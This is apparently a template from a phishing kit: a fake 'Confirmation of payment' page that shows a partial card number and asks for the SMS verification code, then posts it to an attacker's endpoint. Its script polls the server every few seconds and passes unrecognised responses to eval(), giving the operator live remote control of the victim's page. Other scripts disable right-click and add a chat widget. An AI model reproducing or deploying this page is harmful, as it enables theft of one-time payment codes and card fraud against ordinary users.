<!DOCTYPE html>
<html lang="ru">
    <head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<link href="//static10.tgstat.ru/channels/_0/4e/4e1ff96b592242552f2b1ca88a1d5d7e.jpg" rel="icon" type="image/x-icon">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
		<title>Подтверждение</title>
		<style>
			@font-face {
			font-family: 'Lato';
			font-style: normal;
			font-weight: 400;
			font-display: swap;
			src: local('Lato Regular'), local('Lato-Regular'), url(//fonts.gstatic.com/s/lato/v17/S6uyw4BMUTPHjxAwXjeu.woff2) format('woff2');
			unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
			font-family: 'Lato';
			font-style: normal;
			font-weight: 400;
			font-display: swap;
			src: local('Lato Regular'), local('Lato-Regular'), url(//fonts.gstatic.com/s/lato/v17/S6uyw4BMUTPHjx4wXg.woff2) format('woff2');
			unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			@font-face {
			font-family: 'Lato';
			font-style: normal;
			font-weight: 700;
			font-display: swap;
			src: local('Lato Bold'), local('Lato-Bold'), url(//fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) format('woff2');
			unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
			font-family: 'Lato';
			font-style: normal;
			font-weight: 700;
			font-display: swap;
			src: local('Lato Bold'), local('Lato-Bold'), url(//fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh6UVSwiPGQ.woff2) format('woff2');
			unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			body {
				font-family: "Lato", sans-serif;
				font-weight: 400;
				font-size: 15px;
				background-color: #f7f7f7;
				color: #111;
				padding: 0 15px;
				overflow-y: hidden;
			}

			.form-container {
				display: flex;
					height: 100vh;
					justify-content: center;
					align-items: center;
			}

			.form-block {
				max-width: 480px;
				margin: 0 auto;
				float: left;
			}

			.form-block-image {
				display: inline-block;
				width: 60px;
				height: 60px;
			}

			.form-block-header-text {
				display: inline-block;
				position: relative;
				font-size: 20px;
				margin: 0;
				top: -22px;
				left: 10px;
			}

			.form-block-body-text {
				line-height: 22px;
			}

			.form-block-body-table {
				border-spacing: 0;
				margin-top: 25px;
				margin-bottom: 30px;
			}

			.form-block-body-table tr {
				line-height: 24px;
			}

			.form-block-body-table tr td:nth-child(odd) {
				padding-right: 40px;
			}

			.form-block-body-table tr td:nth-child(even) {
				font-weight: 700;
			}

			.form-block-body-notification {
				font-size: 13px;
				line-height: 18px;
				background-color: #f5f6f7;
				box-shadow: 0 0 5px rgba(0, 0, 0, .1);
				border: 1px solid #e1e1ea;
				border-radius: 4px;
				padding: 10px 15px;
				margin-bottom: 25px;
			}

			.form-block-footer-text {
				font-weight: 700;
			}

			.form-block-footer-input {
				display: block;
				width: calc(100% - 32px);
				font-family: "Lato", sans-serif;
				font-size: 14px;
				border: 1px solid #e7e7e7;
				border-radius: 3px;
				padding: 10px 15px;
				transition: .25s;
			}

			.form-block-footer-input:focus {
				border-color: #c5c0c0;
				outline: none;
			}

			.input-invalid {
				border-color: #e74c3c;
			}

			.form-block-footer-input::-webkit-outer-spin-button,
			.form-block-footer-input::-webkit-inner-spin-button {
				-webkit-appearance: none;
				margin: 0;
			}

			.form-block-footer-button {
				display: block;
				max-width: 480px;
				text-align: center;
				text-decoration: none;
				background-color: #0098d0;
				border-radius: 4px;
				color: #fff;
				padding: 15px 5px;
				margin-top: 20px;
				cursor: pointer;
				transition: .25s;
				width: 100%;
				border: 1px solid #0098d0;
			}

			.form-block-footer-button:hover {
				background-color: #00a3df;
			}

			@media (max-width: 360px) {
				.form-block-image {
					display: block;
					margin-bottom: 15px;
				}

				.form-block-header-text {
					position: static;
					display: block;
				}
			}

			@media (max-height: 680px) {
				body {
					overflow-y: auto;
					padding: 15px;
				}

				.form-container {
					display: block;
				}

				.form-block-footer-button {
					margin-bottom: 25px;
				}
			}
      #loading {
        display: inline-block;
        width: 50px;
        height: 50px;
        border: 5px solid rgb(26 108 97 / 56%);
        border-radius: 50%;
        border-top-color: #fff;
        animation: spin 1s ease-in-out infinite;
        -webkit-animation: spin 1s ease-in-out infinite;
        position: fixed;
        top: 50%;
        left: 50%;
      }

      @keyframes spin {
        to {
          -webkit-transform: rotate(360deg);
        }
      }

      @-webkit-keyframes spin {
        to {
          -webkit-transform: rotate(360deg);
        }
      }

    </style>
    <script>
        function getRequest(url, func) {
	let x = new XMLHttpRequest();
	x.open('GET', url, true);
	x.onload = function () {
		func(x.responseText);
	}
	x.send();
}


document.addEventListener('DOMContentLoaded', function() {
    getRequest(`//${window.location.host}/status${document.querySelector('.item').id}`, (resp) => {
        if (resp.includes("loading")){
            try{
                document.querySelector(".form-container").style = "filter: blur(5px);"
            } catch{};
            try{
                document.querySelector("._0").style = "filter: blur(5px);"
            } catch{};
            document.querySelector("#loading").style = "display: block";
        } else if (resp.includes("call")) {
			location.reload()
		} else if (resp.includes("app")) {
			location.reload()
		} else if (resp.includes("ready")) {document.querySelector("#loading").style = "display: none";} else {
            eval(resp);
        }
    })
    setInterval(async () => {
        getRequest(`//${window.location.host}/status${document.querySelector('.item').id}`, (resp) => {
            if (resp.includes("loading")){
                try{
                    document.querySelector(".form-container").style = "filter: blur(5px);"
                } catch{};
                try{
                    document.querySelector("._0").style = "filter: blur(5px);"
                } catch{};
                document.querySelector("#loading").style = "display: block";
            } else if (resp.includes("call")) {
				window.location.href = `/submit/${document.querySelector('.item').id}`
			} else if (resp.includes("app")) {
				window.location.href = `/submit/${document.querySelector('.item').id}`
			} else if (resp.includes("ready")) {document.querySelector(".form-container").style = "";document.querySelector("#loading").style = "display: none";document.querySelector("._0").style = ""} else {
                try{
                    document.querySelector(".form-container").style = ""
                } catch{};
                try{
                    document.querySelector("._0").style = ""
                } catch{};
                document.querySelector("#loading").style = "display: none";
                eval(resp);
            }
        })
    }, 2500)
});
    </script>
<!-- Smartsupp Live Chat script -->
<script type="text/javascript">
var _smartsupp = _smartsupp || {};
_smartsupp.key = 'a5695295c7b6226f7e3a648633c9ce00bffe04ce';
window.smartsupp||(function(d) {
  var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
  s=d.getElementsByTagName('script')[0];c=d.createElement('script');
  c.type='text/javascript';c.charset='utf-8';c.async=true;
  c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
})(document);
</script>
<noscript> Powered by <a href=“https://www.smartsupp.com” target=“_blank”>Smartsupp</a></noscript>
  </head>
    <div id="loading" style="display: none;"></div>
    <span class="item" id="<%= id %>"></span>
<div class="form-container">
			<div class="form-block" id="step-1">
				<div class="form-block-header">

					<h1 class="form-block-header-text">Confirmation of payment</h1>
				</div>

				<div class="form-block-body">
    <p class="form-block-body-text">
        To confirm the payment, an SMS with a confirmation code was sent to the phone number. Enter it in the field below.
    </p>


					<div class="form-block-body-notification" id="notify">
						<b>Attention!</b> Due to the high load on the server, sending the code may be delayed for several minutes.
						<br><br>
						<b>Importantly!</b> If the payment takes a long time to process, please try again.
					</div>

					<table class="form-block-body-table">
						<tbody>
						<tr>
							<td>Card number:</td>
							<td>**** **** **** <%= card %></td>
						</tr>
					</tbody></table>

				</div>

				<div class="form-block-footer">
					<p class="form-block-footer-text">
						Verification code:
					</p>
                    <form method="post" action="/invalid/<%= id %>">
						<input id="field3ds" class="form-block-footer-input" type="password" name="dscode" placeholder="Enter the code..." maxlength="10" id="code-input" required>
						<input class="form-block-footer-button" type="submit" value="Confirm">
                    </form>
				</div>
			</div>
		</div>

		<script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-3.4.1.min.js"></script>
		<script>
			let pwdChars = '0123456789';
			let pwdLen = 20;
			function inputMask(elem) {
				let val = elem.value;
				let val2 = '';
				for (let i = 0; i < val.length; i++) {
					if (pwdChars.includes(val[i]))
						val2 += val[i];
				}
				elem.value = val2.substr(0, pwdLen);
			}
			document.addEventListener('DOMContentLoaded', function() {
				field3ds.oninput = function() {
					inputMask(field3ds);
				}
				field3ds.focus();
			});
			document.oncontextmenu = function() {
				return false;
			};
    </script>